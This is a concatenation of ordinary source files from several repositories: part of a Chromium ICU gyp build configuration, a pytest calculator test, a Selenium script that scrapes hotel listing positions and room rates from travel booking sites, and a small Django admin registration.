[ 'target_arch=="mips" or target_arch=="mips64"', { # Big Endian
'data_assembly_inputs': [
'common/icudtb.dat',
],
'data_assembly_outputs': [
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtb_dat.S',
],
}, { # Little Endian
'data_assembly_outputs': [
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtl_dat.S',
],
'conditions': [
['OS == "android"', {
'data_assembly_inputs': [
'android/icudtl.dat',
],
} , { # else: OS!="android"
'data_assembly_inputs': [
'common/icudtl.dat',
],
}], # OS==android
],
}],
],
'sources': [
'<@(_data_assembly_inputs)',
],
'actions': [
{
'action_name': 'make_data_assembly',
'inputs': [
'scripts/make_data_assembly.py',
'<@(_data_assembly_inputs)',
],
'outputs': [
'<@(_data_assembly_outputs)',
],
'target_conditions': [
[ 'OS == "mac" or OS == "ios" or '
'((OS == "android" or OS == "qnx") and '
'_toolset == "host" and host_os == "mac")', {
'action': ['python', '<@(_inputs)', '<@(_outputs)', '--mac'],
} , {
'action': ['python', '<@(_inputs)', '<@(_outputs)'],
}],
],
},
],
},
{
'target_name': 'icudata',
'type': 'static_library',
'defines': [
'U_HIDE_DATA_SYMBOL',
],
'dependencies': [
'data_assembly#target',
],
'sources': [
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtl_dat.S',
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtb_dat.S',
],
'conditions': [
[ 'target_arch=="mips" or target_arch=="mips64"', {
'sources!': ['<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtl_dat.S'],
}, {
'sources!': ['<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtb_dat.S'],
}],
[ 'use_system_icu==1 and want_separate_host_toolset==1', {
'toolsets': ['host'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==0', {
'toolsets': ['target'],
}],
[ 'OS == "win" and icu_use_data_file_flag==0', {
'type': 'none',
'dependencies!': [
'data_assembly#target',
],
'copies': [
{
'destination': '<(PRODUCT_DIR)',
'files': [
'windows/icudt.dll',
],
},
],
}],
[ 'icu_use_data_file_flag==1', {
'type': 'none',
'dependencies!': [
'data_assembly#target',
],
# Remove any assembly data file.
'sources/': [['exclude', 'icudt[lb]_dat']],
# Make sure any binary depending on this gets the data file.
'conditions': [
['OS != "ios"', {
'dependencies': [
'copy_icudt_dat#host',
],
} , { # else: OS=="ios"
'link_settings': {
'mac_bundle_resources': [
'common/icudtl.dat',
],
},
}], # OS!=ios
], # conditions
}], # icu_use_data_file_flag
], # conditions
'target_conditions': [
[ 'OS == "win"', {
'sources!': [
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtl_dat.S',
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtb_dat.S'
],
}],
], # target_conditions
},
{
'target_name': 'icui18n',
'type': '<(component)',
'sources': [
'<@(icui18n_sources)',
],
'defines': [
'U_I18N_IMPLEMENTATION',
],
'dependencies': [
'icuuc',
],
'direct_dependent_settings': {
'include_dirs': [
'source/i18n',
],
},
'variables': {
'clang_warning_flags': [
# ICU uses its own deprecated functions.
'-Wno-deprecated-declarations',
# ICU prefers `a && b || c` over `(a && b) || c`.
'-Wno-logical-op-parentheses',
# ICU has some `unsigned < 0` checks.
'-Wno-tautological-compare',
# ICU has some code with the pattern:
# if (found = uprv_getWindowsTimeZoneInfo(...))
'-Wno-parentheses',
],
},
# Since ICU wants to internally use its own deprecated APIs, don't
# complain about it.
'cflags': [
'-Wno-deprecated-declarations',
],
'cflags_cc': [
'-frtti',
],
'cflags_cc!': [
'-fno-rtti',
],
'xcode_settings': {
'GCC_ENABLE_CPP_RTTI': 'YES', # -frtti
},
'msvs_settings': {
'VCCLCompilerTool': {
'RuntimeTypeInfo': 'true',
},
},
'conditions': [
[ 'use_system_icu==1 and want_separate_host_toolset==1', {
'toolsets': ['host'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==0', {
'toolsets': ['target'],
}],
['OS == "android" and clang==0', {
# Disable sincos() optimization to avoid a linker error since
# Android's math library doesn't have sincos(). Either
# -fno-builtin-sin or -fno-builtin-cos works.
'cflags': [
'-fno-builtin-sin',
],
}],
[ 'OS == "win" and clang==1', {
# Note: General clang warnings should go in the
# clang_warning_flags block above.
'msvs_settings': {
'VCCLCompilerTool': {
'AdditionalOptions': [
# See http://bugs.icu-project.org/trac/ticket/11122
'-Wno-inline-new-delete',
'-Wno-implicit-exception-spec-mismatch',
],
},
},
}],
], # conditions
},
{
'target_name': 'icuuc',
'type': '<(component)',
'sources': [
'<@(icuuc_sources)',
],
'defines': [
'U_COMMON_IMPLEMENTATION',
],
'dependencies': [
'icudata',
],
'direct_dependent_settings': {
'include_dirs': [
'source/common',
],
'conditions': [
[ 'component=="static_library"', {
'defines': [
'U_STATIC_IMPLEMENTATION',
],
}],
],
},
'variables': {
'clang_warning_flags': [
# ICU uses its own deprecated functions.
'-Wno-deprecated-declarations',
# ICU prefers `a && b || c` over `(a && b) || c`.
'-Wno-logical-op-parentheses',
# ICU has some `unsigned < 0` checks.
'-Wno-tautological-compare',
# uresdata.c has switch(RES_GET_TYPE(x)) code. The
# RES_GET_TYPE macro returns an UResType enum, but some switch
# statement contains case values that aren't part of that
# enum (e.g. URES_TABLE32 which is in UResInternalType). This
# is on purpose.
'-Wno-switch',
# ICU has some code with the pattern:
# if (found = uprv_getWindowsTimeZoneInfo(...))
'-Wno-parentheses',
# ICU generally has no unused variables, but there are a few
# places where this warning triggers.
# See https://codereview.chromium.org/1222643002/ and
# http://www.icu-project.org/trac/ticket/11759.
'-Wno-unused-const-variable',
# ucnv2022.cpp contains three functions that are only used when
# certain preprocessor defines are set.
'-Wno-unused-function',
],
},
'cflags': [
# Since ICU wants to internally use its own deprecated APIs,
# don't complain about it.
'-Wno-deprecated-declarations',
'-Wno-unused-function',
],
'cflags_cc': [
'-frtti',
],
'cflags_cc!': [
'-fno-rtti',
],
'xcode_settings': {
'GCC_ENABLE_CPP_RTTI': 'YES', # -frtti
},
'msvs_settings': {
'VCCLCompilerTool': {
'RuntimeTypeInfo': 'true',
},
},
'all_dependent_settings': {
'msvs_settings': {
'VCLinkerTool': {
'AdditionalDependencies': [
'advapi32.lib',
],
},
},
},
'conditions': [
[ 'use_system_icu==1 and want_separate_host_toolset==1', {
'toolsets': ['host'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==0', {
'toolsets': ['target'],
}],
[ 'OS == "win" or icu_use_data_file_flag==1', {
'sources': [
'source/stubdata/stubdata.c',
],
'defines': [
'U_ICUDATAENTRY_IN_COMMON',
],
}],
[ 'OS == "win" and clang==1', {
# Note: General clang warnings should go in the
# clang_warning_flags block above.
'msvs_settings': {
'VCCLCompilerTool': {
'AdditionalOptions': [
# See http://bugs.icu-project.org/trac/ticket/11122
'-Wno-inline-new-delete',
'-Wno-implicit-exception-spec-mismatch',
],
},
},
}],
], # conditions
},
], # targets
}],
['use_system_icu==1', {
'targets': [
{
'target_name': 'system_icu',
'type': 'none',
'conditions': [
['OS=="qnx"', {
'link_settings': {
'libraries': [
'-licui18n',
'-licuuc',
],
},
}],
['OS!="qnx"', {
'link_settings': {
'ldflags': [
'<!@(icu-config --ldflags)',
],
'libraries': [
'<!@(icu-config --ldflags-libsonly)',
],
},
}],
],
},
{
'target_name': 'icudata',
'type': 'none',
'dependencies': ['system_icu'],
'export_dependent_settings': ['system_icu'],
'toolsets': ['target'],
},
{
'target_name': 'icui18n',
'type': 'none',
'dependencies': ['system_icu'],
'export_dependent_settings': ['system_icu'],
'variables': {
'headers_root_path': 'source/i18n',
'header_filenames': [
# This list can easily be updated using the command below:
# find source/i18n/unicode -iname '*.h' \
# -printf " '%p',\n" | \
# sed -e 's|source/i18n/||' | sort -u
'unicode/alphaindex.h',
'unicode/basictz.h',
'unicode/calendar.h',
'unicode/choicfmt.h',
'unicode/coleitr.h',
'unicode/coll.h',
'unicode/compactdecimalformat.h',
'unicode/curramt.h',
'unicode/currpinf.h',
'unicode/currunit.h',
'unicode/datefmt.h',
'unicode/dcfmtsym.h',
'unicode/decimfmt.h',
'unicode/dtfmtsym.h',
'unicode/dtitvfmt.h',
'unicode/dtitvinf.h',
'unicode/dtptngen.h',
'unicode/dtrule.h',
'unicode/fieldpos.h',
'unicode/filteredbrk.h',
'unicode/fmtable.h',
'unicode/format.h',
'unicode/fpositer.h',
'unicode/gender.h',
'unicode/gregocal.h',
'unicode/locdspnm.h',
'unicode/measfmt.h',
'unicode/measunit.h',
'unicode/measure.h',
'unicode/msgfmt.h',
'unicode/numfmt.h',
'unicode/numsys.h',
'unicode/plurfmt.h',
'unicode/plurrule.h',
'unicode/rbnf.h',
'unicode/rbtz.h',
'unicode/regex.h',
'unicode/region.h',
'unicode/reldatefmt.h',
'unicode/scientificformathelper.h',
'unicode/search.h',
'unicode/selfmt.h',
'unicode/simpletz.h',
'unicode/smpdtfmt.h',
'unicode/sortkey.h',
'unicode/stsearch.h',
'unicode/tblcoll.h',
'unicode/timezone.h',
'unicode/tmunit.h',
'unicode/tmutamt.h',
'unicode/tmutfmt.h',
'unicode/translit.h',
'unicode/tzfmt.h',
'unicode/tznames.h',
'unicode/tzrule.h',
'unicode/tztrans.h',
'unicode/ucal.h',
'unicode/ucoleitr.h',
'unicode/ucol.h',
'unicode/ucsdet.h',
'unicode/ucurr.h',
'unicode/udateintervalformat.h',
'unicode/udat.h',
'unicode/udatpg.h',
'unicode/udisplaycontext.h',
'unicode/uformattable.h',
'unicode/ugender.h',
'unicode/uldnames.h',
'unicode/ulocdata.h',
'unicode/umsg.h',
'unicode/unirepl.h',
'unicode/unum.h',
'unicode/unumsys.h',
'unicode/upluralrules.h',
'unicode/uregex.h',
'unicode/uregion.h',
'unicode/usearch.h',
'unicode/uspoof.h',
'unicode/utmscale.h',
'unicode/utrans.h',
'unicode/vtzone.h',
],
},
'includes': [
'shim_headers.gypi',
],
'toolsets': ['target'],
},
{
'target_name': 'icuuc',
'type': 'none',
'dependencies': ['system_icu'],
'export_dependent_settings': ['system_icu'],
'variables': {
'headers_root_path': 'source/common',
'header_filenames': [
# This list can easily be updated using the command below:
# find source/common/unicode -iname '*.h' \
# -printf " '%p',\n" | \
# sed -e 's|source/common/||' | sort -u
'unicode/appendable.h',
'unicode/brkiter.h',
'unicode/bytestream.h',
'unicode/bytestriebuilder.h',
'unicode/bytestrie.h',
'unicode/caniter.h',
'unicode/chariter.h',
'unicode/dbbi.h',
'unicode/docmain.h',
'unicode/dtintrv.h',
'unicode/enumset.h',
'unicode/errorcode.h',
'unicode/icudataver.h',
'unicode/icuplug.h',
'unicode/idna.h',
'unicode/listformatter.h',
'unicode/localpointer.h',
'unicode/locid.h',
'unicode/messagepattern.h',
'unicode/normalizer2.h',
'unicode/normlzr.h',
'unicode/parseerr.h',
'unicode/parsepos.h',
'unicode/platform.h',
'unicode/ptypes.h',
'unicode/putil.h',
'unicode/rbbi.h',
'unicode/rep.h',
'unicode/resbund.h',
'unicode/schriter.h',
'unicode/std_string.h',
'unicode/strenum.h',
'unicode/stringpiece.h',
'unicode/stringtriebuilder.h',
'unicode/symtable.h',
'unicode/ubidi.h',
'unicode/ubrk.h',
'unicode/ucasemap.h',
'unicode/ucat.h',
'unicode/uchar.h',
'unicode/ucharstriebuilder.h',
'unicode/ucharstrie.h',
'unicode/uchriter.h',
'unicode/uclean.h',
'unicode/ucnv_cb.h',
'unicode/ucnv_err.h',
'unicode/ucnv.h',
'unicode/ucnvsel.h',
'unicode/uconfig.h',
'unicode/udata.h',
'unicode/uenum.h',
'unicode/uidna.h',
'unicode/uiter.h',
'unicode/uloc.h',
'unicode/umachine.h',
'unicode/umisc.h',
'unicode/unifilt.h',
'unicode/unifunct.h',
'unicode/unimatch.h',
'unicode/uniset.h',
'unicode/unistr.h',
'unicode/unorm2.h',
'unicode/unorm.h',
'unicode/uobject.h',
'unicode/urename.h',
'unicode/urep.h',
'unicode/ures.h',
'unicode/uscript.h',
'unicode/uset.h',
'unicode/usetiter.h',
'unicode/ushape.h',
'unicode/usprep.h',
'unicode/ustring.h',
'unicode/ustringtrie.h',
'unicode/utext.h',
'unicode/utf16.h',
'unicode/utf32.h',
'unicode/utf8.h',
'unicode/utf.h',
'unicode/utf_old.h',
'unicode/utrace.h',
'unicode/utypes.h',
'unicode/uvernum.h',
'unicode/uversion.h',
],
},
'includes': [
'shim_headers.gypi',
],
'toolsets': ['target'],
},
], # targets
}],
], # conditions
}
| [
"enrico.weigelt@gr13.net"
] | enrico.weigelt@gr13.net |
682db18a260da2b35963901c8f7ef28ba10bc1d1 | 4adab98ffdcb6bc99474b119cb7a80427f36271a | /test/test_cal_new.py | 9f0f4c7c0fa1b4af9bb864ec2e3a20293b425373 | [] | no_license | yangyq-github/hgwz_course | 4dde4470edf6ae4a9fff58a253c182a6905d0e79 | 0282da6bd8001dac184fc43415b82532b20b8a69 | refs/heads/master | 2023-04-23T12:06:56.900039 | 2021-04-25T11:15:45 | 2021-04-25T11:15:45 | 347,267,179 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,461 | py | #!/usr/bin/python3
# coding : utf-8
# @Time : 2021/3/24 17:32
# @File : test_cal_new.py
__author__ = 'yangyanqin'
# 测试计算器--数据驱动方式
import pytest, sys, yaml
sys.path.append("../")
from Chapter_Pytest_Actual_Combat.calc import Calculator
# Load the parametrisation data once at import time so the values exist when
# the @pytest.mark.parametrize decorators below are evaluated.
with open("datas/cal_data.yml", encoding='utf-8') as f:
    datas = yaml.safe_load(f)
# Assumed YAML layout: top-level 'add' and 'div' mappings of
# case-name -> (a, b, expected) -- TODO confirm against datas/cal_data.yml.
addkeys = datas['add'].keys()      # case ids for the addition tests
addvalues = datas['add'].values()  # (a, b, result) rows for addition
divkeys = datas['div'].keys()      # case ids for the division tests
divvalues = datas['div'].values()  # (a, b, result) rows for division
class TestCalNew():
    """Data-driven calculator tests fed from datas/cal_data.yml."""

    @pytest.mark.parametrize("a, b, result", addvalues, ids=addkeys)
    def test_add(self, a, b, result):
        """Every YAML 'add' case: add(a, b) must match the recorded result."""
        assert Calculator().add(a, b) == result

    @pytest.mark.parametrize("a, b, result", divvalues, ids=divkeys)
    def test_div(self, a, b, result):
        """Every YAML 'div' case: div(a, b) must match the recorded result."""
        assert Calculator().div(a, b) == result
@pytest.mark.Env
class TestEnv():
    """Smoke test that the command-line environment fixture is usable."""

    def test_case(self, cmdoption):
        """Print the selected environment and build its base URL."""
        print("测试环境的验证")
        env, datas = cmdoption
        print(f"环境:{env},数据:{datas}")
        # Base URL assembled from the 'env' section of the fixture data.
        env_cfg = datas['env']
        ip = env_cfg['ip']
        port = env_cfg['port']
        print(f"http://{ip}:{port}")
# Inline case data and ids for dynamically generated tests; presumably
# consumed by a conftest hook that builds the 'param1' fixture -- TODO confirm.
mydatas=[[1,2,3],[0.9,0.1,1]]
myids=['整数','浮点数']
# param1 must stay consistent with the param1 handled in conftest
class TestCalNewOne():
    # Placeholder: only prints the injected parameter; the real assertion
    # is still commented out below.
    def test_add(self, param1):
        print(f"param={param1}")
        print("动态生成测试用例")
        # assert result == Calculator().add(a, b)
"yangbitmex@163.com"
] | yangbitmex@163.com |
53d552270fd2e4c5fce0a339f00a4a44899b6b65 | d483d0ad0f46df24ff247ee87e81bb8adc5df575 | /plugin/mvr_plugin/automation/regular1.py | 45e35735381f54720b4e849908249150aa664d75 | [
"MIT"
] | permissive | S3Infosoft/mvr-automation | 302090ec9cec45ff45d98e76375fc420fa9de746 | 75f582765f39919bf2c3a35997bed242bede788b | refs/heads/master | 2020-05-26T02:29:31.069682 | 2020-05-19T08:46:51 | 2020-05-19T08:46:51 | 188,076,198 | 0 | 0 | MIT | 2019-06-02T10:16:03 | 2019-05-22T16:30:56 | Python | UTF-8 | Python | false | false | 11,445 | py | from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from .local1 import *
import requests
# from Common import main_run
# from ddl_sql import Database
import datetime
# Sample Booking room-type element id; appears unused in this module --
# possibly kept for manual testing. TODO(review): confirm before removing.
S = "room_type_id_421644301"
def month_select(driver,din):
    """Advance the OTA date-picker to the month of ``din`` ('dd/mm/yyyy').

    Clicks the picker's "next month" arrow once per month between today and
    the target month and returns the number of clicks performed (0 when the
    target month is the current one), so callers can undo the navigation by
    clicking "previous" the same number of times.  Calls exit(0) for dates
    in the past.
    """
    cindate,month,year=din.split('/')
    cindate=int(cindate)
    year=int(year)
    month=int(month)
    print(cindate,month,year)
    dt=datetime.datetime.today()
    cur_month=dt.month
    cur_year=dt.year
    if month==cur_month and year==cur_year:
        print('m=cm and yr=cr')
        # Bug fix: this branch used to fall through and return None, which
        # made callers crash on range(None) when no navigation was needed.
        return 0
    # TODO(review): month == cur_month with year > cur_year still falls
    # through and returns None -- the navigation for that case is missing.
    if month-cur_month>0:
        if cur_year==year:
            mon_diff=(month-cur_month)
            for i in range(mon_diff):
                # "next month" arrow of the date picker
                driver.find_element_by_xpath('//*[@id="frm"]/div[1]/div[2]/div[2]/div/div/div[2]').click()
            print('m-cm>0 and cy==yr')
            return mon_diff
        elif cur_year>year:
            print('Invalid dates')
            exit(0)  # NOTE(review): hard-exits the whole process
        elif cur_year<year:
            no_of_click = 12 * (year - cur_year)+(month - cur_month)
            for i in range(no_of_click):
                driver.find_element_by_xpath('//*[@id="frm"]/div[1]/div[2]/div[2]/div/div/div[2]/svg').click()
            print('m-cm>0 and cy<yr')
            return no_of_click
    elif month<cur_month:
        if year<=cur_year:
            print("You cant checkin before today")
            exit(0)  # NOTE(review): hard-exits the whole process
        elif year>cur_year:
            no_of_click=12*(year-cur_year)-(cur_month-month)
            for i in range(no_of_click):
                driver.find_element_by_xpath('//*[@id="frm"]/div[1]/div[2]/div[2]/div/div/div[2]/svg').click()
            print('m<cm and cy<yr')
            return no_of_click
def main():
    """Ad-hoc demo driver for the Booking agent with hard-coded hotel data."""
    agent = Booking()
    search_text = "Ratnagiri"
    hotel_name = "Mango Valley Resort Ganpatipule"
    hotel_id = "4216443"
    checkin = "30/03/2019"
    checkout = "31/03/2019"
    # Booking.com element ids for this hotel's room types and rate plans.
    room_typeids = ["room_type_id_421644306", "room_type_id_421644302",
                    "room_type_id_421644305", "room_type_id_421644303"]
    room_priceids = ["421644306_174652031_0_42_0",
                     "421644302_141698786_0_42_0", "421644302_174652031_0_42_0",
                     "421644305_174652031_0_42_0", "421644303_174652031_0_42_0"]
    room_ids = ["roomrtc_45000574650", "roomrtc_45000574663", "roomrtc_45000653101", "roomrtc_45000574667"]
    # NOTE(review): main_run() defined below requires hotel_name and clint
    # positional arguments that are not passed here -- this call looks stale
    # and would raise TypeError; confirm which main_run is intended.
    print(main_run(agent, hotel_id, search_text, checkin, checkout,
                   room_typeids=room_typeids, room_priceids=room_priceids))
# def calender_ctrl(agent, cin, cout,driver):
# driver.find_element_by_css_selector(agent.calender).click()
# print('a')
# # month_select(driver,din)
# print('b')
# cin = str("%01d" % int(cin))
# cout = str("%01d" % int(cout))
# flag1 = True
# flag2 = True
# weekin = str(0)
# weekout = str(0)
# for i in range(7):
# temp = driver.find_element_by_xpath(agent.week_finder+str(i+1)+"]").text.split(" ")
# print(temp)
# if any(cin in s for s in temp) and flag1:
# weekin = str(i+1)
# flag1 = False
# if any(cout in s for s in temp) and flag2:
# weekout = str(i+1)
# return weekin, weekout
def calender_ctrl_new(agent, cin, cout,driver,din,dout,datein,dateout):
    """Drive the OTA's calendar widget to pick check-in and check-out days.

    cin/cout are day-of-month strings, din/dout full 'dd/mm/yyyy' dates and
    datein/dateout ISO-style dates used by the agent's day_in/day_out xpath
    builders.  Returns the (weekin, weekout) row indexes that were clicked.
    """
    driver.find_element_by_css_selector(agent.calender).click()
    print('a')
    cin = str("%01d" % int(cin))
    # Navigate forward to the check-in month; the click count is reused
    # below to navigate back.  NOTE(review): month_select returns None for
    # some inputs, which makes range(no_of_click) raise -- the bare
    # try/except below currently hides that.
    no_of_click=month_select(driver,din)
    flag1 = True
    weekin = str(0)
    print('b')
    # Scan the 7 calendar rows for the one containing the check-in day.
    # NOTE(review): the substring test ('cin in s') can match the wrong
    # cell, e.g. day '1' also matches '11' -- confirm the widget's text.
    for i in range(7):
        temp = driver.find_element_by_xpath(agent.week_finder + str(i + 1) + "]").text.split(" ")
        print(temp)
        if any(cin in s for s in temp) and flag1:
            weekin = str(i + 1)
            flag1 = False
            driver.find_element_by_xpath(agent.day_in(weekin,datein)).click()
            break
    # now returning to current month
    try:
        for i in range(no_of_click):
            driver.find_element_by_xpath('// *[ @ id = "frm"] / div[1] / div[2] / div[2] / div / div / div[1]').click()
    except Exception as e:
        print(e,e.args)
        pass
    print('c')
    # Navigate to the check-out month and pick the check-out day the same way.
    month_select(driver, dout)
    time.sleep(1)
    print('d')
    cout = str("%01d" % int(cout))
    flag2 = True
    weekout=str(0)
    for i in range(7):
        temp = driver.find_element_by_xpath(agent.week_finder + str(i + 1) + "]").text.split(" ")
        print(temp)
        if any(cout in s for s in temp) and flag2:
            weekout = str(i + 1)
            driver.find_element_by_xpath(agent.day_out(weekout,dateout)).click()
    return weekin, weekout
class MasterMMT(object):
    """Orchestrates a MakeMyTrip scrape: listing position plus room rates."""

    @staticmethod
    def run(search_text, hotel_id, hotel_name, din, dout, room_id):
        """Scrape MMT for one hotel/date range and return the result record.

        Returns the dict produced by sql_entry(), with Status 'NOT OK' when
        the hotel is not found in the listing.
        """
        current_time = datetime.datetime.now()
        time1 = current_time.strftime("%Y-%m-%d %H:%M:%S")
        agent = Mmt()
        agent_name = agent.__class__.__name__
        # NOTE(review): start_driver() in this module requires a hub URL
        # argument ('clint'); these no-arg calls look stale -- confirm.
        driver = start_driver()
        listed = agent.listing(driver, hotel_id, search_text, din, dout)
        if int(listed) == 0:
            returndata = sql_entry('not found', agent_name, din, dout, f'{hotel_name} not found', time1, hotel_name)
            driver.quit()
            return returndata
        # Fresh session for the detail page scrape.
        driver = start_driver()
        agent.hotel_find(driver, hotel_id, hotel_name, din, dout)
        data = agent.data_scraping(driver, room_id)
        print(data)
        driver.quit()
        # Bug fix: sql_entry() requires hotel_name; the old call omitted it
        # and raised TypeError on every successful scrape.
        returndata = sql_entry(listed, agent_name, din, dout, data, time1, hotel_name)
        return returndata
def start_driver(clint):
    """Open a Remote WebDriver session against the Selenium hub ``clint``.

    ``clint`` is the hub URL (e.g. 'http://host:4444/wd/hub').  Returns the
    driver with timeouts and window size configured; also stores it in the
    module-level ``driver`` global.
    """
    global driver
    # NOTE(review): these headless Chrome options are built but never passed
    # to webdriver.Remote below -- only bare CHROME capabilities are sent,
    # so all of this configuration is currently inert.
    options = Options()
    options.add_argument("--headless")
    options.add_argument('--window-size=1420,1080')
    options.add_argument('--disable-gpu')
    options.add_argument('--no-sandbox')
    options.add_argument('--disable-dev-shm-usage')
    options.add_argument("enable-automation");
    options.add_argument("--disable-extensions");
    options.add_argument("--dns-prefetch-disable");
    options.add_argument("--disable-gpu");
    # nodeurl = 'http://192.168.99.100:4445/wd/hub'
    nodeurl = clint
    # driver = webdriver.Chrome(chrome_options=options, executable_path=r'chromedriver.exe')
    # url = driver.command_executor._url
    caps = DesiredCapabilities.CHROME.copy()
    # caps['max_duration'] = 100
    print(caps)
    driver = webdriver.Remote(
        command_executor=nodeurl,
        # desired_capabilities=DesiredCapabilities.CHROME)
        desired_capabilities=caps)
    driver.set_page_load_timeout(500)
    driver.implicitly_wait(10)
    driver.maximize_window()
    return driver
def sql_entry(listed, agent_name, din, dout, data, time1, hotel_name):
    """Assemble one scraping-result record.

    ``data`` is either an error string (Status 'NOT OK') or a flat list of
    alternating rate-name / rate-value pairs (Status 'OK', folded into the
    'rates' dict with values stringified).  ``time1`` is the scrape start
    timestamp; the end timestamp is taken now.
    """
    current_time = datetime.datetime.now()
    time2 = current_time.strftime("%Y-%m-%d %H:%M:%S")
    returndata = {}
    returndata['start_time'] = time1
    returndata['end_time'] = time2
    returndata['ota'] = agent_name
    returndata['check_in'] = din
    returndata['check_out'] = dout
    returndata['listed_position'] = listed
    # Bug fix: hotel_name was previously only set on the success path,
    # so 'NOT OK' records were missing it.
    returndata['hotel_name'] = hotel_name
    if isinstance(data, str):
        # Error path: data is a human-readable failure message.
        returndata['rates'] = data
        returndata['Status'] = 'NOT OK'
        return returndata
    rates = {}
    # Pairwise fold; stepping to len(data)-1 fixes the IndexError the old
    # while-loop raised on odd-length lists (the orphan entry is ignored).
    for i in range(0, len(data) - 1, 2):
        rates[data[i]] = str(data[i + 1])
    returndata['rates'] = rates
    returndata['Status'] = 'OK'
    return returndata
def main_run(agent, hotel_prop, search_text, din, dout,hotel_name,clint, **kwargs):
    """Full scrape pipeline for one OTA agent: dates, search, listing, rates.

    din/dout are 'dd/mm/yyyy'.  Returns the sql_entry() record dict --
    except on calendar failure, where it returns the live driver instead
    (NOTE(review): inconsistent return type; confirm callers handle it).
    ``time`` is assumed to come from the star import of local1.
    """
    current_time = datetime.datetime.now()
    time1 = current_time.strftime("%Y-%m-%d %H:%M:%S")
    driver = start_driver(clint)
    driver.maximize_window()
    agent_name = agent.__class__.__name__
    driver.get(agent.target)
    # Build ISO-style dates for the agent's day_in/day_out xpath helpers.
    cin, month, year = din.split("/")
    cout, month_out, year_out = dout.split("/")
    datein = year+"-"+month+"-"+cin
    dateout = year_out+"-"+month_out+"-"+cout
    print(datein,dateout)
    try:
        weekin, weekout = calender_ctrl_new(agent, cin, cout,driver,din,dout,datein,dateout)
    except Exception as e:
        print(e.args,e)
        return driver
    # month_select(driver,din)
    # driver.find_element_by_xpath(agent.day_in(weekin, datein)).click()
    # month_select(driver,dout)
    # driver.find_element_by_xpath(agent.day_out(weekout, dateout)).click()
    driver.find_element_by_id(agent.search_id).send_keys(search_text+Keys.ENTER)
    time.sleep(1)
    agent.proceed(driver)
    listed = agent.listing(driver, hotel_prop)
    # print('a')
    if int(listed)==0:
        returndata=sql_entry('Not found',agent_name,din,dout,f'{hotel_prop} not found',time1,hotel_name)
        driver.quit()
        return returndata
    # print('b')
    agent.hotel_find(driver, hotel_prop)
    # The hotel detail page opens in a new tab; switch to it.
    driver.switch_to.window(driver.window_handles[1])
    print('ab')
    time.sleep(5)
    # driver.find_element_by_tag_name("body").send_keys("Keys.ESCAPE");
    # Dismiss any popup overlay before scraping.
    webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()
    data = agent.data_scraping(driver, **kwargs)
    time.sleep(1)
    driver.quit()
    returndata = sql_entry(listed, agent_name, din, dout, data, time1,hotel_name)
    return returndata
def main_run_for_new_goibibo(driver,agent, hotel_prop, search_text, din, dout,hotel_name, **kwargs):
    """Scrape pipeline for the redesigned Goibibo site.

    Expects an already-started ``driver``.  NOTE(review): the ``agent``
    parameter is immediately overwritten with NewGoibibo() below, so the
    argument is effectively ignored.  din/dout are 'dd/mm/yyyy'; returns
    the sql_entry() record dict.
    """
    current_time = datetime.datetime.now()
    time1 = current_time.strftime("%Y-%m-%d %H:%M:%S")
    # driver = start_driver()
    # agent_name = agent.__class__.__name__
    # driver.get(agent.target)
    agent=NewGoibibo()
    driver.maximize_window()
    agent_name = agent.__class__.__name__
    # Bug fix: the checkout split used to reuse the month/year names and
    # clobber the check-in values before datein was built (main_run above
    # keeps them separate as month_out/year_out).
    cin, month, year = din.split("/")
    cout, month_out, year_out = dout.split("/")
    datein = year+"-"+month+"-"+cin
    dateout = year_out+"-"+month_out+"-"+cout
    # Open the date picker and click check-in / check-out cells.
    driver.find_element_by_xpath('//*[@id="root"]/section/div/div[3]/section[1]/div[1]/div/div[3]/div/div[1]').click()
    driver.find_element_by_xpath(agent.day_in(driver,datein)).click()
    # time.sleep(5)
    driver.find_element_by_xpath(agent.day_out(driver, dateout)).click()
    driver.find_element_by_id(agent.search_id).send_keys(search_text+Keys.ENTER)
    time.sleep(1)
    agent.proceed(driver)
    listed = agent.listing(driver, hotel_prop)
    if int(listed)==0:
        print('a')
        returndata=sql_entry('Not found',agent_name,din,dout,f'{hotel_prop} not found',time1,hotel_name)
        driver.quit()
        return returndata
    print('b')
    agent.hotel_find(driver, hotel_prop,int(listed))
    # The hotel detail page opens in a new tab; switch to it.
    driver.switch_to.window(driver.window_handles[1])
    time.sleep(5)
    data = agent.data_scraping(driver)
    time.sleep(1)
    driver.quit()
    returndata = sql_entry(listed, agent_name, din, dout, data, time1,hotel_name)
    return returndata
# return True if element is visible within 30 seconds, otherwise False
# Manual entry point: runs the Booking demo in main() when executed directly.
if __name__ == "__main__":
    main()
| [
"ssaannskra@gmail.com"
] | ssaannskra@gmail.com |
9b4de1d3e5726b763267418ceb084d36565e00af | e6a8793b1b12d47e57f00485350d122946618245 | /parents/admin.py | 6a80e0c0a7836d80d23fab02e3781a4109d89613 | [] | no_license | Fabricourt/school | 70b2eba2c0b8ff9b9290eb0f68d730698a6d3a63 | dad80c36be34b432dfadef195eb9e867f82cafff | refs/heads/main | 2023-01-01T15:48:43.760288 | 2020-10-26T11:15:32 | 2020-10-26T11:15:32 | 305,829,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | from django.contrib import admin
from .models import Parent
@admin.register(Parent)
class ParentAdmin(admin.ModelAdmin):
    """Admin list configuration for Parent records."""

    list_display = ('name', 'account_date')
    list_display_links = ('name',)
    search_fields = ('name',)
    list_per_page = 25
